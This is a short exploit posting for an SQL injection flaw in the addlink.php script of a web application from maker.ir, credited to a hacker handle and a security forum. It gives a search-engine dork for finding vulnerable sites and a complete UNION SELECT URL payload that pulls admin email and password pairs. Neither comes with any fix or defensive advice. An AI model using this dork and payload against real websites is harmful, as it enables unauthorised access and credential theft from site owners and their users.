|
|  list Web  (addlink.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://maker.ir
|
| DorK   : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="
|___________________________________________________|
 
Exploit:
________
 
 
www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--
 
IQ-SecuritY FoRuM